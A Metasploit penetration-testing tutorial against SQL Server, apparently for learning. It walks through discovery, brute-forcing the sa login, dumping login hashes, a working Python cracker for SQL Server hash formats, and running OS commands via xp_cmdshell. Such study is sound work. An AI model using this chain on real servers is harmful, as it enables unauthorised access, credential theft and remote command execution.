Preface
A brief walkthrough of penetration testing and privilege escalation against SQL Server using Metasploit.
1. Footprinting with nmap
db_nmap -sV -p1433,1434 192.168.1.106 #TCP version scan of the default SQL Server port 1433 and of 1434; ports are comma-separated, with a space nmap would treat 1434 as a second host
services #list the services discovered so far
db_nmap -sU --script=ms-sql-info -p1434 192.168.1.106 #UDP scan of the SQL Server Browser service (UDP/1434) with the ms-sql-info script, which returns instance names, versions and the TCP port of each instance (-sU needs root)
2. Scanning with Metasploit
use auxiliary/scanner/mssql/mssql_ping #msf's dedicated SQL Server discovery module, which queries the Browser service on UDP/1434
options #show the configurable parameters
set rhosts 192.168.1.106 #set the target
run #scan
Compared with nmap, the msf module's output is easier to read, and it lists every instance together with the TCP port it actually listens on; this matters because named instances normally use a dynamic port rather than 1433, so a TCP scan of 1433 alone misses them.
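Both nmap's ms-sql-info script and mssql_ping speak the same tiny protocol to the SQL Server Browser service. The following is an added example, not code from the original post or from Metasploit: it builds the one-byte CLNT_UCAST_EX probe, parses the SVR_RESP reply into per-instance dictionaries, and maps the reported engine version to a product family. The reply it parses offline is constructed, not captured from a real host; send_probe() is the only function that touches the network.

```python
# Added example, not from the original post: a minimal client for the SQL
# Server Browser service (SSRP, UDP/1434), the protocol behind nmap's
# ms-sql-info script and Metasploit's mssql_ping. The parser is exercised
# offline on a constructed reply; send_probe() does real network I/O.
import socket

CLNT_UCAST_EX = b"\x03"  # request: list every instance on the host
SVR_RESP = 0x05          # first byte of the Browser's reply

# The Browser reports the engine version string; major.minor identifies the product.
PRODUCT_BY_VERSION = {
    "8.0": "SQL Server 2000", "9.0": "SQL Server 2005",
    "10.0": "SQL Server 2008", "10.50": "SQL Server 2008 R2",
    "11.0": "SQL Server 2012", "12.0": "SQL Server 2014",
    "13.0": "SQL Server 2016", "14.0": "SQL Server 2017",
    "15.0": "SQL Server 2019", "16.0": "SQL Server 2022",
}


def build_probe() -> bytes:
    """CLNT_UCAST_EX is a single 0x03 byte; no instance name is needed."""
    return CLNT_UCAST_EX


def product_name(version: str) -> str:
    """Map a '15.0.2000.5' style version to its product family."""
    parts = version.split(".")
    key = ".".join(parts[:2]) if len(parts) >= 2 else version
    return PRODUCT_BY_VERSION.get(key, "unknown (%s)" % version)


def parse_svr_resp(data: bytes) -> list[dict]:
    """Parse SVR_RESP: 0x05, 2-byte little-endian length, then ';'-separated
    key/value pairs, each instance terminated by ';;'."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP packet")
    length = int.from_bytes(data[1:3], "little")
    body = data[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2:
            continue  # trailing empty chunk after the final ';;'
        inst = {fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)}
        if inst.get("InstanceName"):
            inst["Product"] = product_name(inst.get("Version", ""))
            instances.append(inst)
    return instances


def send_probe(host: str, timeout: float = 2.0) -> list[dict]:
    """Send the probe to UDP/1434 on a real host and parse whatever comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(), (host, 1434))
        data, _ = sock.recvfrom(65535)
    return parse_svr_resp(data)


# Constructed reply (not captured from a real host): the default instance on
# 1433 and a named instance on a dynamic port, as a Browser would report them.
SAMPLE_BODY = (
    b"ServerName;WIN-SQL01;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;15.0.2000.5;tcp;1433;;"
    b"ServerName;WIN-SQL01;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;14.0.1000.169;tcp;49172;"
    b"np;\\\\WIN-SQL01\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_RESPONSE = bytes([SVR_RESP]) + len(SAMPLE_BODY).to_bytes(2, "little") + SAMPLE_BODY

if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE_RESPONSE):
        print(inst["InstanceName"], inst.get("tcp", "no TCP"), inst["Product"])
```

Because the Browser answers over UDP with no authentication, the reply is only a hint: confirm the TCP port it reports with a real connection before trusting it, and remember that an instance whose TCP listener is disabled shows up with no tcp field at all.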
3. Cracking SQL Server passwords
use auxiliary/scanner/mssql/mssql_login #msf module that brute-forces SQL Server authentication
set rhosts 192.168.1.106 #set the target
run #with no other settings this only tries the sa login with a blank password (USERNAME sa, BLANK_PASSWORDS true)
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
Set USER_FILE and PASS_FILE (load wordlists) for a more thorough brute-force, and set STOP_ON_SUCCESS true to stop at the first working credential. Keep in mind that SQL Server logs failed logins by default ("Login failed for user ..." in the error log), so a long wordlist run is noisy.
4. Finding the password hashes of other users on the server
use auxiliary/scanner/mssql/mssql_hashdump #dumps the password hashes of the server's SQL logins (reads sys.sql_logins, or master.dbo.sysxlogins on SQL Server 2000), so the login used must have sysadmin rights
options #show settings
set rhosts 192.168.1.106 #set the target
set username sa #the login obtained in step 3
set password 123456 #its password
run #dump the hashes
The hashes cannot be decrypted: they are salted SHA-1 (prefix 0x0100, SQL Server 2005/2008) or SHA-512 (prefix 0x0200, SQL Server 2012 and later) digests that have to be cracked offline with a wordlist (hashcat modes 132 and 1731, John's mssql05 and mssql12 formats). The recovered passwords are then reused against other logins and other hosts, which is where the privilege gain usually comes from.
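To make the hash format concrete, here is an added example that is not part of the original post and not Metasploit's code: it reproduces the on-disk layout that mssql_hashdump returns (version prefix, 4-byte salt, digest over the UTF-16LE password plus salt), then runs a wordlist against it. The "dump" it cracks is constructed with mssql_hash() inside the block, not taken from a server, and the login names and passwords in it are made up. The SQL Server 2000 variant, which carries a second digest of the upper-cased password, is included because it lets you crack case-insensitively first.

```python
# Added example, not from the original post: reproduce and crack the hash
# format that mssql_hashdump returns. SQL Server stores
#   0x0100 + 4-byte salt + SHA-1(UTF-16LE(password) + salt)    (2005/2008)
#   0x0200 + 4-byte salt + SHA-512(UTF-16LE(password) + salt)  (2012 and later)
# SQL Server 2000 appends a second SHA-1 of the upper-cased password to 0x0100.
# Every hash below is constructed here with mssql_hash(), not dumped from a server.
import hashlib
from typing import Optional

SHA1_LEN, SHA512_LEN = 20, 64


def mssql_hash(password: str, salt: bytes, version: int = 0x0200,
               sql2000: bool = False) -> str:
    """Build a hash string in the stored format: '0x' + version + salt + digest."""
    if len(salt) != 4:
        raise ValueError("SQL Server salts are 4 bytes")
    data = password.encode("utf-16-le") + salt
    if version == 0x0200:
        digest = hashlib.sha512(data).digest()
    elif version == 0x0100:
        digest = hashlib.sha1(data).digest()
        if sql2000:  # second, case-insensitive digest used by SQL Server 2000
            digest += hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    else:
        raise ValueError("unknown hash version 0x%04x" % version)
    return "0x" + (version.to_bytes(2, "big") + salt + digest).hex().upper()


def split_hash(hash_hex: str) -> tuple:
    """Return (version, salt, digest) from a '0x...' hash string."""
    raw = bytes.fromhex(hash_hex[2:] if hash_hex[:2].lower() == "0x" else hash_hex)
    return int.from_bytes(raw[:2], "big"), raw[2:6], raw[6:]


def check_password(hash_hex: str, candidate: str, case_insensitive: bool = False) -> bool:
    """True if candidate produces the stored digest under the hash's version."""
    version, salt, digest = split_hash(hash_hex)
    data = candidate.encode("utf-16-le") + salt
    if version == 0x0200 and len(digest) == SHA512_LEN:
        return hashlib.sha512(data).digest() == digest
    if version == 0x0100 and len(digest) in (SHA1_LEN, 2 * SHA1_LEN):
        if case_insensitive and len(digest) == 2 * SHA1_LEN:
            # SQL 2000 only: compare against the upper-cased digest in bytes 20..40
            upper = candidate.upper().encode("utf-16-le") + salt
            return hashlib.sha1(upper).digest() == digest[SHA1_LEN:]
        return hashlib.sha1(data).digest() == digest[:SHA1_LEN]
    raise ValueError("unrecognised hash layout")


def crack(hash_hex: str, wordlist, case_insensitive: bool = False) -> Optional[str]:
    """Return the first wordlist entry that matches, or None."""
    for word in wordlist:
        if check_password(hash_hex, word, case_insensitive):
            return word
    return None


def crack_dump(dump: dict, wordlist, case_insensitive: bool = False) -> dict:
    """Run the wordlist over a login -> hash mapping."""
    return {login: crack(h, wordlist, case_insensitive) for login, h in dump.items()}


# Constructed dump (hypothetical logins, passwords and salts), keyed like a
# hashdump result: login -> hash string.
SAMPLE_DUMP = {
    "sa": mssql_hash("123456", bytes.fromhex("01020304")),
    "reporting": mssql_hash("Summer2024", bytes.fromhex("deadbeef"), 0x0100),
    "legacy": mssql_hash("Winter2024", bytes.fromhex("cafebabe"), 0x0100, sql2000=True),
}
WORDLIST = ["password", "123456", "summer2024", "Summer2024", "winter2024"]

if __name__ == "__main__":
    print(crack_dump(SAMPLE_DUMP, WORDLIST))
    print(crack_dump(SAMPLE_DUMP, WORDLIST, case_insensitive=True))
```

The case-sensitive pass recovers sa and reporting; legacy only falls to the case-insensitive pass because the wordlist has the wrong capitalisation, which is exactly why SQL Server 2000 hashes were so much weaker. For real dumps use hashcat or John, which implement the same arithmetic on a GPU.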
5. Enumerating SQL Server
use auxiliary/admin/mssql/mssql_enum #the module lives under admin/mssql, not scanner; it enumerates version, configuration, databases, logins, sysadmin members and whether xp_cmdshell is enabled
options
set username ....
set password 123456
set rhosts 192.168.1.106
run
6. Post-exploitation
Use the mssql_sql module to run SQL queries and mssql_exec to run OS commands through xp_cmdshell; if xp_cmdshell has been disabled, mssql_exec re-enables it with sp_configure (which needs sysadmin rights) before running the command, and that change is visible to anyone auditing the server's configuration afterwards.
use auxiliary/admin/mssql/mssql_exec #run a cmd command through xp_cmdshell
options
set rhosts 192.168.1.106 #target plus the sysadmin credentials from the previous steps
set username sa
set password 123456
set CMD 'ipconfig' #the cmd command
run
Use mssql_sql to execute SQL statements (the default query is select @@version)
msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > options
Module options (auxiliary/admin/mssql/mssql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SQL select @@version no The SQL query to execute
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf6 auxiliary(admin/mssql/mssql_sql) >
Summary
This post gave a quick overview of the basic methods and steps for penetration testing and privilege escalation against SQL Server with Metasploit; it is for learning purposes only, questions and discussion are welcome.